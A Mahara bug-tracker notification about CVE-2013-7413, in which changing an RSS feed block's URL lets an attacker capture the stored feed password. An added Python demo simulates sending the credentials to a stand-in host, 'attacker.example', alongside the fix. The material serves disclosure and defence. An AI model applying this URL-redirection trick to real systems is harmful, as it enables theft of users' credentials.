mahara-contributors team mailing list archive
Message #22501
[Bug 1172096] Re: Require re-entering RSS feed password when you change the URL
** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2013-7413
--
You received this bug notification because you are a member of Mahara
Contributors, which is subscribed to Mahara.
Matching subscriptions: Subscription for all Mahara Contributors -- please ask on #mahara-dev or mahara.org forum before editing or unsubscribing it!
https://bugs.launchpad.net/bugs/1172096
Title:
Require re-entering RSS feed password when you change the URL
Status in Mahara ePortfolio:
Fix Released
Status in Mahara 1.5 series:
Fix Released
Status in Mahara 1.6 series:
Fix Released
Status in Mahara 1.7 series:
Fix Released
Bug description:
If we implement a fix for https://bugs.launchpad.net/mahara/+bug/1016253 (encrypt RSS feed usernames & passwords), there's still a potential attack vector in the URL to the RSS feed.
Attack:
1a. Masquerade as the user
1b. OR get the user to give you a copy of the Page containing the RSS feed block
2. Enter the settings for the RSS feed block (or its copy)
3. Change the URL of the RSS feed to point at your own server
Result:
When Mahara next refreshes the RSS feed, it will send the plaintext username and password to your server, where you can easily capture it.
Fix:
Require a user to re-enter the password when they change the URL
To manage notifications about this bug go to:
https://bugs.launchpad.net/mahara/+bug/1172096/+subscriptions
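The attack and fix in the bug description, as an added illustration that is not Mahara's own code (Mahara is PHP; this is a Python model of the same logic). The names FeedBlock, save_settings_vulnerable, save_settings_fixed and PasswordRequired are hypothetical, the http_get callable is a constructed stand-in for the network, and base64 only stands in for the at-rest encryption from bug 1016253. The point it shows: a refresh necessarily sends the stored credential in the clear to whatever host the URL names, so a settings save that keeps the old password while accepting a new URL hands the credential to an attacker-controlled server; refusing that combination closes the hole.

```python
"""Added example, not Mahara code: a feed block whose stored credential is
replayed to whatever URL the block points at, a vulnerable settings save,
and the fixed save that requires re-entering the password on URL change."""
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit
import base64


@dataclass(frozen=True)
class FeedBlock:
    url: str
    username: str
    # Stored encrypted at rest in the real system (bug 1016253); the toy
    # base64 "encryption" below is only a stand-in for that, not a cipher.
    password_enc: str


def encrypt(plain: str) -> str:
    return base64.b64encode(plain.encode()).decode()


def decrypt(enc: str) -> str:
    return base64.b64decode(enc).decode()


def refresh(block: FeedBlock, http_get):
    """Cron-style refresh: fetch the feed with HTTP Basic auth. The
    credential is decrypted and sent to the host in block.url, which is
    why the URL itself is part of the attack surface."""
    return http_get(block.url, auth=(block.username, decrypt(block.password_enc)))


class PasswordRequired(Exception):
    """Raised when the URL changed but no password was re-entered."""


def save_settings_vulnerable(block: FeedBlock, new_url: str,
                             new_username: str, new_password: Optional[str]) -> FeedBlock:
    """Before the fix: a blank password field means 'keep the stored one',
    even when the URL now points somewhere else."""
    enc = encrypt(new_password) if new_password else block.password_enc
    return FeedBlock(new_url, new_username, enc)


def save_settings_fixed(block: FeedBlock, new_url: str,
                        new_username: str, new_password: Optional[str]) -> FeedBlock:
    """After the fix: the stored password may only be carried over when the
    URL is unchanged; any URL change requires re-entering the password.
    Comparing the literal URL (not just the host) is the stricter choice."""
    if new_url != block.url and not new_password:
        raise PasswordRequired("feed URL changed; re-enter the feed password")
    enc = encrypt(new_password) if new_password else block.password_enc
    return FeedBlock(new_url, new_username, enc)


def demo():
    """Run the attack against both save handlers. Returns what the
    attacker's host received under the vulnerable handler, and whether
    the fixed handler refused the same edit."""
    captured = []

    def fake_http_get(url, auth):
        # Constructed stand-in for the network: records what each host sees.
        captured.append((urlsplit(url).hostname, auth))
        return "<rss/>"

    # Constructed victim block: a private feed with stored credentials.
    victim = FeedBlock("https://feeds.example.org/private.rss", "alice", encrypt("s3cret"))
    evil_url = "https://attacker.example/collect"

    # Attacker (masquerading, or holding a copy of the page) changes only
    # the URL and leaves the password field blank.
    hijacked = save_settings_vulnerable(victim, evil_url, "alice", None)
    refresh(hijacked, fake_http_get)
    leaked = captured[-1]  # ('attacker.example', ('alice', 's3cret'))

    try:
        save_settings_fixed(victim, evil_url, "alice", None)
        blocked = False
    except PasswordRequired:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The check has to run on the copied block too (attack path 1b): a copy of the page carries the stored ciphertext with it, so the copy's settings form is just as able to retarget the URL as the original's.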